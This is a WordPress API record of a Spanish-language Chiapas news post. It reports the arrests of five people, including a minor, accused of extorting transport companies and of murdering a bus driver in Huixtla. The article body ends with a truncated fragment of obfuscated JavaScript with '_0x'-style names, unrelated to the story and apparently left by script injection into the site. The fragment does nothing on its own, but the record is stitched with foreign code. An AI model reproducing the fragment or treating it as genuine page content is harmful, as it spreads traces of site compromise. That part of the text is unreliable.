{"id":330,"date":"2022-03-09T00:15:52","date_gmt":"2022-03-09T00:15:52","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=330"},"modified":"2022-03-09T00:15:54","modified_gmt":"2022-03-09T00:15:54","slug":"fge-captura-a-cinco-presuntos-extorsionadores-de-transportistas-en-la-region-costa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=330","title":{"rendered":"FGE captura a cinco presuntos extorsionadores de transportistas en la regi\u00f3n Costa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"960\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646784912956.jpg\" alt=\"\" class=\"wp-image-331\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646784912956.jpg 960w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646784912956-300x300.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646784912956-150x150.jpg 150w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646784912956-768x768.jpg 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p>COMUNICADO<\/p>\n\n\n\n<p>08 de Marzo del 2022. Tuxtla Guti\u00e9rrez, Chiapas 08 Marzo 2022. &#8211; En respuesta a la demanda del sector transportista del estado, la Fiscal\u00eda General del Estado (FGE) , a trav\u00e9s de la Fiscal\u00eda Antisecuestro en coordinaci\u00f3n con las Fiscal\u00edas de Adolescentes y Fronterizo Costa, ejecut\u00f3 orden de aprehensi\u00f3n en contra de cinco personas, cuatro hombres y una mujer, por su presunta responsabilidad en los delitos de Extorsi\u00f3n y Homicidio, en agravio de integrantes del sector transportista del municipio de Huixtla.<\/p>\n\n\n\n<p>En seguimiento a las denuncias por el delito de extorsi\u00f3n, presentadas por miembros del gremio transportista en municipios de la zona Costa de Chiapas, elementos de la Fiscal\u00eda Antisecuestro en colaboraci\u00f3n con elementos de la Polic\u00eda Especializada adscritos a la Fiscal\u00eda de Adolescentes y Fiscal\u00eda Fronterizo Costa realizaron labores de investigaci\u00f3n e Inteligencia, logrando dar cumplimiento a cinco mandamientos aprehensorios en acciones diferentes desarrolladas del 1 al 6 de marzo del presente a\u00f1o.<\/p>\n\n\n\n<p>De esta forma, el pasado 1 de marzo, elementos de la Fiscal\u00eda Antisecuestro, ejecutaron orden de aprehensi\u00f3n en contra de Darinel &#8220;N&#8221; por su presunta responsabilidad en el delito de Extorsi\u00f3n en agravio de la v\u00edctima de identidad reservada, identificada con las iniciales S.A.F., representante de la empresas de transporte Belisario Dom\u00ednguez y Piedra de Huixtla, S.A de C.V.<\/p>\n\n\n\n<p>El 4 de marzo pasado, elementos de la Fiscal\u00eda Antisecuestro, ejecutaron en el municipio de Tapachula, orden de aprehensi\u00f3n en contra de Fernando &#8220;N&#8221;, por el delito de extorsi\u00f3n, en agravio de la v\u00edctima de identidad reservada, identificada con las iniciales S.A.F., representante de las empresas de transporte Belisario Dom\u00ednguez y Piedra de Huixtla, S.A de C.V.<\/p>\n\n\n\n<p>Asimismo el pasado 4 de marzo, elementos de la Fiscal\u00eda Antisecuestro, dieron cumplimiento en el municipio de Mapastepec a la orden de aprehensi\u00f3n en contra de Rosa Nery &#8220;N&#8221;, por su probable responsabilidad en el delito de extorsi\u00f3n, en agravio de la v\u00edctima de identidad resguardada, identificada con las iniciales S.A.F., representante de las empresas de transporte Belisario Dom\u00ednguez y Piedra de Huixtla, S.A de C.V.<\/p>\n\n\n\n<p>El pasado 5 de marzo, elementos de la Polic\u00eda Especializada adscritos a la Fiscal\u00eda de Adolescentes, ejecutaron orden de aprehensi\u00f3n en contra del menor de 15 a\u00f1os de edad, de identidad resguardada, identificado con las iniciales U.G.G.G; y este 6 de marzo del presente a\u00f1o, elementos de la Polic\u00eda Especializada adscritos a la Fiscal\u00eda Fronterizo Costa, ejecutaron orden de aprehensi\u00f3n en contra de Jos\u00e9 de Jes\u00fas \u201cN&#8221;, ambos por su probable responsabilidad en el delito de Homicidio, en agravio de quien en vida respond\u00eda al nombre de Nehem\u00edas &#8220;N&#8221;, quien se desempe\u00f1aba como chofer de la empresa de transporte p\u00fablico Belisario Dom\u00ednguez, en el municipio de Huixtla.<\/p>\n\n\n\n<p>Los hoy imputados fueron puestos a disposici\u00f3n del \u00d3rgano de Control, autoridad que definir\u00e1 su situaci\u00f3n jur\u00eddica en las pr\u00f3ximas horas.<\/p>\n\n\n\n<p>Cabe mencionar que las detenciones se encuentran vinculadas a extorsiones a grupos transportistas en los municipios de Mapastepec, Escuintla, Acacoyagua, Acapetahua, Villa Comaltitlan y Huixtla.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>COMUNICADO 08 de Marzo del 2022. Tuxtla Guti\u00e9rrez, Chiapas 08 Marzo 2022. &#8211; En respuesta a la demanda del sector transportista del estado, la Fiscal\u00eda General del Estado (FGE) , a trav\u00e9s de la Fiscal\u00eda Antisecuestro en coordinaci\u00f3n con las Fiscal\u00edas de Adolescentes y Fronterizo Costa, ejecut\u00f3 orden de aprehensi\u00f3n en contra de cinco personas, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":331,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-330","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/330","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=330"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/330\/revisions"}],"predecessor-version":[{"id":332,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/330\/revisions\/332"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/331"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=330"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=330"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=330"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}